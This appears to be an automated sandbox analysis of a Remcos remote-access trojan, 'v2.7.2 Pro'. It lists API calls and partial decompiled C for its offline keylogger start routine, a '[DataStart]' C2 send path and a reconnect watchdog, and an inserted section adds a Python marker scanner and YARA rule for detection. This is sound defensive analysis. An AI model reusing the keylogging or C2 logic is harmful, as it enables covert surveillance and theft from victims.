                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004023E3
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$V01@@$??4?$basic_string@V01@$??1?$basic_string@$?length@?$basic_string@?substr@?$basic_string@V12@$??0?$basic_string@??9std@@CreateD@2@@0@V?$basic_string@$?c_str@?$basic_string@?data@?$basic_string@?size@?$basic_string@CloseD@1@@EventHandleObjectSingleThreadWait
                                  • String ID:
                                  • API String ID: 3745950881-0
                                  • Opcode ID: 44daeea15bb855e80108764f54982e8e04786625b5849f173a8cb93a7b3b47fc
                                  • Instruction ID: 9121e1d36d2ed1e5780a03bc3f6ba97c1b97061ac4fd9a6be39e0f6b7c1c719d
                                  • Opcode Fuzzy Hash: 44daeea15bb855e80108764f54982e8e04786625b5849f173a8cb93a7b3b47fc
                                  • Instruction Fuzzy Hash: 0451FD7250060EEFCB049FA0DD88CEEBB78FF84355B00806AF916A71A0DB745985CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BE70,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040244A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60([DataStart],00000013,?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402463
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040246E
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000F,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040247B
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040248D
                                  • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402498
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024A7
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024B1
                                  • send.WS2_32(?,00000000), ref: 004024BB
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024C7
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024D1
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024EB
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024F5
                                  • send.WS2_32(?,00000000), ref: 004024FF
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402509
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402512
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040251B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$?length@?$basic_string@$??1?$basic_string@$?data@?$basic_string@A?$basic_string@send$??0?$basic_string@?c_str@?$basic_string@?empty@?$basic_string@D@1@@V01@V01@@Y?$basic_string@
                                  • String ID: [DataStart]
                                  • API String ID: 1403384299-3852763199
                                  • Opcode ID: a6039b55a21c89a02e1cf1528b19330316269f3f8a1329a8a34a52ca146de8b9
                                  • Instruction ID: 4f95a53d81068631c3648da1c5498cf22458e2818172e99049c3d90a1b667ab5
                                  • Opcode Fuzzy Hash: a6039b55a21c89a02e1cf1528b19330316269f3f8a1329a8a34a52ca146de8b9
                                  • Instruction Fuzzy Hash: 7621EA72500509EBCB05DF90DD599EE7778EB98342F108176E907A61E0DB705E44CFA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(override,00000000), ref: 00409D63
                                    • Part of subcall function 0040B4C8: RegOpenKeyExA.KERNEL32(80000001,00408EBE,00000000,00020019,00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E), ref: 0040B4E7
                                    • Part of subcall function 0040B4C8: RegQueryValueExA.KERNEL32(00408EBE,?,00000000,80000001,?,00000000,0041BCB0,?,?,?,00408EBE,80000001,00000000), ref: 0040B505
                                    • Part of subcall function 0040B4C8: RegCloseKey.KERNEL32(00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E,00415774), ref: 0040B510
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(0041BA28,?,?,?,00000001), ref: 00409D96
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(pth_unenc,?,?,?,00000001), ref: 00409DB3
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409DC6
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(2.7.2 Pro,?), ref: 00409DDC
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(004166F0), ref: 00409DE5
                                  • Sleep.KERNEL32(00000BB8), ref: 00409DFA
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(0041BA28,?,?,?,00000001), ref: 00409E11
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(pth_unenc,?,?,?,00000001), ref: 00409E2E
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409E41
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(2.7.2 Pro,?), ref: 00409E57
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(004166F0), ref: 00409E60
                                  • exit.MSVCRT ref: 00409E77
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$?c_str@?$basic_string@D@2@@std@@D@std@@$??0?$basic_string@$??1?$basic_string@D@1@@V01@@$CloseOpenQuerySleepValueexit
                                  • String ID: 2.7.2 Pro$override$pth_unenc
                                  • API String ID: 3602623569-3893205188
                                  • Opcode ID: 66a132f25811430172b3037b5f7f4ac2c14d205858bba7e1f82af523167656d2
                                  • Instruction ID: 2889bc0b5ca8399aadfd957be20fb2b9bea035d2a19627ad42be5e9aadac3fca
                                  • Opcode Fuzzy Hash: 66a132f25811430172b3037b5f7f4ac2c14d205858bba7e1f82af523167656d2
                                  • Instruction Fuzzy Hash: 2E31B772A50604BBD70477E59C4AEFE776DEF84740F44002AF911971D1DFB8498187AE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                  • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,6B015DF0), ref: 00412A90
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A9A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AA3
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$?length@?$basic_string@V12@$??4?$basic_string@?substr@?$basic_string@V01@V01@@$??0?$basic_string@?find@?$basic_string@D@1@@
                                  • String ID:
                                  • API String ID: 3435050692-0
                                  • Opcode ID: cf897032fafc8a7a18bc323011148a7a1d4392e457d1882d7af56b3e3f1ca591
                                  • Instruction ID: d00c3f8f62f9657134ffe5fc931faad8ab4b4020c85508924df81fb6bcd52547
                                  • Opcode Fuzzy Hash: cf897032fafc8a7a18bc323011148a7a1d4392e457d1882d7af56b3e3f1ca591
                                  • Instruction Fuzzy Hash: F631BB7250050EEBCB04EFA0E959CDE7778EF94745B108066F812E7160EB74AB49CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 26%
                                  			E00405180(void* __ecx, char _a4) {
                                  				char _v5;
                                  				char _v6;
                                  				void* _t14;
                                  				void* _t18;
                                  				void* _t19;
                                  				void* _t29;
                                  				void* _t32;
                                  				char* _t33;
                                  				void* _t36;
                                  
                                  				_t19 = __ecx;
                                  				 *((char*)(__ecx + 0x3c)) = 1;
                                  				__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z( &_a4, _t29, _t32, _t18, __ecx);
                                  				E00405156(__ecx);
                                  				_t33 = "Offline Keylogger Started";
                                  				if( *0x41b154 != 0x32) {
                                  					_t36 = _t36 - 0x10;
                                  					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t33,  &_v5);
                                  					E00405DD3(__ecx);
                                  				}
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t33,  &_v5);
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("[INFO]",  &_v6);
                                  				E0041203B();
                                  				CreateThread(0, 0, E0040528A, _t19, 0, 0); // executed
                                  				if( *_t19 == 0) {
                                  					CreateThread(0, 0, E0040526A, _t19, 0, 0); // executed
                                  				}
                                  				_t14 = CreateThread(0, 0, E00405299, _t19, 0, 0); // executed
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				return _t14;
                                  			}

Decompiler address map for E00405180 (one instruction address per line of the C code above, collapsed into a range): 0x00405185 .. 0x0040522f

                                  APIs
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,73B743E0,0041BCB0,00000000,0041B900,?,004095B7,?,?,?,?,?,?,?,?,00000000), ref: 00405194
                                    • Part of subcall function 00405156: GetKeyboardLayout.USER32(00000000), ref: 0040515B
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000011), ref: 004051B9
                                    • Part of subcall function 00405DD3: GetLocalTime.KERNEL32(?,73B743E0,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DE1
                                    • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[%04i/%02i/%02i %02i:%02i:%02i ,?,],?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DF9
                                    • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,]), ref: 00405E06
                                    • Part of subcall function 00405DD3: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,]), ref: 00405E12
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E1B
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E24
                                    • Part of subcall function 00405DD3: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,]), ref: 00405E2D
                                    • Part of subcall function 00405DD3: malloc.MSVCRT ref: 00405E37
                                    • Part of subcall function 00405DD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,004051C6,?,?,?,?,]), ref: 00405E61
                                    • Part of subcall function 00405DD3: sprintf.MSVCRT ref: 00405E69
                                    • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E7C
                                    • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E8C
                                    • Part of subcall function 00405DD3: SetEvent.KERNEL32(00000000), ref: 00405E95
                                    • Part of subcall function 00405DD3: free.MSVCRT(00000000), ref: 00405E9C
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405EA6
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Offline Keylogger Started,?,?,?,?,004095B7,?,?,?,?,?,?,?,?,00000000,00000011), ref: 004051D0
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 004051E4
                                  • CreateThread.KERNEL32(00000000,00000000,0040528A,0041B900,00000000,00000000), ref: 00405204
                                  • CreateThread.KERNEL32(00000000,00000000,0040526A,0041B900,00000000,00000000), ref: 00405214
                                  • CreateThread.KERNEL32(00000000,00000000,00405299,0041B900,00000000,00000000), ref: 00405220
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00405225
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@V01@$??0?$basic_string@CreateD@1@@Thread$??4?$basic_string@D@2@@0@G@2@@std@@G@std@@Hstd@@V01@@V?$basic_string@Y?$basic_string@$?c_str@?$basic_string@?length@?$basic_string@EventKeyboardLayoutLocalTimeV10@V10@@freemallocsprintf
                                  • String ID: Offline Keylogger Started$[INFO]
                                  • API String ID: 2375278975-3749928830
                                  • Opcode ID: 303e79ea2cc5c2cbfd283ade35e3199abe0d4046d42ab0fcd3c9033e32dd0592
                                  • Instruction ID: 8504defec12b76ce36e14f0a9cecbbf8a862f08db34b94f1b2a8f952895fda8e
                                  • Opcode Fuzzy Hash: 303e79ea2cc5c2cbfd283ade35e3199abe0d4046d42ab0fcd3c9033e32dd0592
                                  • Instruction Fuzzy Hash: D611D371601A18BBD7117766DC8DDEF3F2CDE862E0740407AF80692281DB794944CEF9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 44%
                                  			E004027B1(void* __ecx) {
                                  				char _v5;
                                  				struct _SYSTEMTIME _v24;
                                  				char _v40;
                                  				void* _v56;
                                  				char* _t29;
                                  				char* _t30;
                                  				void* _t38;
                                  				intOrPtr _t46;
                                  
                                  				_t38 = __ecx;
                                  				 *((intOrPtr*)(__ecx + 0x40)) = 0;
                                  				if( *((intOrPtr*)(__ecx + 0x3c)) <= 0) {
                                  					L3:
                                  					if( *((intOrPtr*)(_t38 + 0x39)) == 0) {
                                  						_t46 =  *0x41bcac; // 0x0
                                  						if(_t46 != 0) {
                                  							GetLocalTime( &_v24);
                                  							_t29 =  &_v5;
                                  							__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("%02i:%02i:%02i:%03i [WARNING] ", _t29, "Timeout expired, resetting connection.\n", _v24.wHour & 0x0000ffff, _v24.wMinute & 0x0000ffff, _v24.wSecond & 0x0000ffff, _v24.wMilliseconds & 0x0000ffff);
                                  							_t30 =  &_v40;
                                  							L00414170();
                                  							__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t30, _t29);
                                  							_t21 = printf(_t30);
                                  							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  						}
                                  						E004020F4(_t21, _t38);
                                  					}
                                  					L7:
                                  					 *((char*)(_t38 + 0x38)) = 0;
                                  					 *((char*)(_t38 + 0x39)) = 0;
                                  					return 0;
                                  				}
                                  				while( *((intOrPtr*)(_t38 + 0x39)) == 0) {
                                  					Sleep(0x3e8); // executed
                                  					 *(_t38 + 0x40) =  *(_t38 + 0x40) + 1;
                                  					_t21 =  *(_t38 + 0x40);
                                  					if( *(_t38 + 0x40) <  *((intOrPtr*)(_t38 + 0x3c))) {
                                  						continue;
                                  					}
                                  					goto L3;
                                  				}
                                  				goto L7;
                                  			}
Decompiler address map for E004027B1 (one instruction address per line of the C code above, collapsed into a range; unresolved lines were listed as 0x00000000): 0x004027b9 .. 0x00402869

                                  APIs
                                  • Sleep.KERNEL32(000003E8), ref: 004027D3
                                  • GetLocalTime.KERNEL32(?), ref: 004027F5
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [WARNING] ,?,Timeout expired, resetting connection.,?,?,?,?), ref: 00402820
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040282B
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00402835
                                  • printf.MSVCRT ref: 0040283C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402848
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402851
                                  Strings
                                  • %02i:%02i:%02i:%03i [WARNING] , xrefs: 0040281B
                                  • Timeout expired, resetting connection., xrefs: 00402815
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@D@1@@D@2@@0@Hstd@@LocalSleepTimeV10@V?$basic_string@printf
                                  • String ID: %02i:%02i:%02i:%03i [WARNING] $Timeout expired, resetting connection.
                                  • API String ID: 2756237499-4159561219
                                  • Opcode ID: 6c118525b0c60a139ccd7d472cd10157555a95a5b55e4d0c4663a8155b7c7e9e
                                  • Instruction ID: eb574a52e8b17308bab00ba60a15c3ae4eff644db24cd51b069feea48370dafb
                                  • Opcode Fuzzy Hash: 6c118525b0c60a139ccd7d472cd10157555a95a5b55e4d0c4663a8155b7c7e9e
                                  • Instruction Fuzzy Hash: 95119372900758EFCB11EBA4D9898EFB7B9BB48301740447FFA42E3581E6B5A944C768
                                  Uniqueness

                                  Uniqueness Score: -1.00%
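Added triage example, not part of the Joe Sandbox report and not code from the Remcos sample: the listings above for E00405180 (the "Offline Keylogger Started" / "[INFO]" strings and the "[%04i/%02i/%02i %02i:%02i:%02i " ... "]" timestamp built in subcall 00405DD3) and for E004027B1 (the "%02i:%02i:%02i:%03i [WARNING] Timeout expired, resetting connection." line printed after the Sleep(1000) watchdog loop runs out), together with the "[DataStart]", "2.7.2 Pro" and "pth_unenc" strings from the earlier API listings, give an analyst a set of plaintext markers to look for in the unpacked memory dump. The script below scans a dump for those markers, emits a YARA rule over them, and parses the two log-line formats. The dump bytes and log lines it runs on are constructed here for offline use (not the real dump 00000002.00000002.920845275.0000000000400000), and the exact layout of the keylog header line (timestamp, event text, closing "]") is an inference from the format strings in the listing, since the report does not show the joined line.

```python
import re
from datetime import datetime

# Plaintext markers copied from the API/string listings on this page.
REMCOS_MARKERS = (
    b"[DataStart]",                              # C2 packet marker, send() at 0x004024FF
    b"Offline Keylogger Started",                # E00405180
    b"[INFO]",                                   # E00405180
    b"2.7.2 Pro",                                # version string near 0x00409DDC
    b"pth_unenc",                                # config string near 0x00409DB3
    b"Timeout expired, resetting connection.",   # E004027B1
    b"%02i:%02i:%02i:%03i [WARNING] ",           # E004027B1 timestamp format
    b"[%04i/%02i/%02i %02i:%02i:%02i ",          # keylog timestamp format, 0x00405DF9
)

def scan_markers(dump: bytes) -> dict:
    """Return {marker: [offsets]} for every marker present in a memory dump."""
    hits = {}
    for marker in REMCOS_MARKERS:
        offsets, start = [], 0
        while (i := dump.find(marker, start)) != -1:
            offsets.append(i)
            start = i + 1
        if offsets:
            hits[marker.decode()] = offsets
    return hits

def yara_rule(name: str = "remcos_markers_from_report", min_hits: int = 3) -> str:
    """Emit a YARA rule over the same markers; at least min_hits must match a PE."""
    lines = [f"rule {name}", "{", "    strings:"]
    for i, marker in enumerate(REMCOS_MARKERS):
        lines.append(f'        $s{i} = "{marker.decode()}" ascii')
    lines += ["    condition:", f"        uint16(0) == 0x5A4D and {min_hits} of ($s*)", "}"]
    return "\n".join(lines)

# Keylog header as reconstructed (assumption) from subcall 0x00405DD3:
# "[%04i/%02i/%02i %02i:%02i:%02i " + <event text> + "]".
_KEYLOG_HDR = re.compile(
    r"^\[(\d{4})/(\d{2})/(\d{2}) (\d{2}):(\d{2}):(\d{2}) (.*)\]$")

def parse_keylog_header(line: str):
    """Parse one keylog header line into its timestamp and event text, or None."""
    m = _KEYLOG_HDR.match(line.strip())
    if not m:
        return None
    y, mo, d, h, mi, s, event = m.groups()
    return {"time": datetime(int(y), int(mo), int(d), int(h), int(mi), int(s)),
            "event": event}

# Console warning built in E004027B1:
# "%02i:%02i:%02i:%03i [WARNING] " + "Timeout expired, resetting connection.\n"
_TIMEOUT = re.compile(
    r"^(\d{2}):(\d{2}):(\d{2}):(\d{3}) \[WARNING\] "
    r"Timeout expired, resetting connection\.$")

def parse_timeout_warning(line: str):
    """Parse the watchdog's timeout warning into its time fields, or None."""
    m = _TIMEOUT.match(line.strip())
    if not m:
        return None
    h, mi, s, ms = (int(x) for x in m.groups())
    return {"hour": h, "minute": mi, "second": s, "millisecond": ms}

# Constructed sample input (not the real dump): a fake MZ header followed by
# a few of the markers with NUL padding between them.
SAMPLE_DUMP = (b"MZ" + b"\x00" * 62 + b"[DataStart]" + b"\x00" * 16
               + b"Offline Keylogger Started\x00[INFO]\x00"
               + b"Timeout expired, resetting connection.\n\x00"
               + b"2.7.2 Pro\x00pth_unenc\x00")

# Constructed log lines shaped by the two format strings above.
SAMPLE_LINES = [
    "[2020/11/20 10:15:02 Offline Keylogger Started]",
    "10:15:03:117 [WARNING] Timeout expired, resetting connection.",
]

if __name__ == "__main__":
    for marker, offsets in scan_markers(SAMPLE_DUMP).items():
        print(f"{marker!r} at {[hex(o) for o in offsets]}")
    print(parse_keylog_header(SAMPLE_LINES[0]))
    print(parse_timeout_warning(SAMPLE_LINES[1]))
    print(yara_rule())
```

The YARA rule requires an MZ header plus three of the markers so that a log file or a pcap containing a single string does not trip it; lower min_hits only when scanning unpacked memory rather than files on disk.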

                                  C-Code - Quality: 79%
                                  			_entry_(void* __ebx, void* __edi, void* __esi) {
                                  				CHAR* _v8;
                                  				intOrPtr* _v24;
                                  				intOrPtr _v28;
                                  				struct _STARTUPINFOA _v96;
                                  				int _v100;
                                  				char** _v104;
                                  				int _v108;
                                  				void _v112;
                                  				char** _v116;
                                  				intOrPtr* _v120;
                                  				intOrPtr _v124;
                                  				intOrPtr* _t24;
                                  				void* _t27;
                                  				intOrPtr _t36;
                                  				signed int _t38;
                                  				int _t40;
                                  				intOrPtr* _t41;
                                  				intOrPtr _t42;
                                  				intOrPtr _t49;
                                  				intOrPtr* _t54;
                                  				intOrPtr _t57;
                                  				intOrPtr _t60;
                                  
                                  				_push(0xffffffff);
                                  				_push(0x416e50);
                                  				_push(0x414130);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t57;
                                  				_v28 = _t57 - 0x68;
                                  				_v8 = 0;
                                  				__set_app_type(2);
                                  				 *0x41c26c =  *0x41c26c | 0xffffffff;
                                  				 *0x41c270 =  *0x41c270 | 0xffffffff;
                                  				 *(__p__fmode()) =  *0x41c264;
                                  				_t24 = __p__commode();
                                  				_t47 =  *0x41c260;
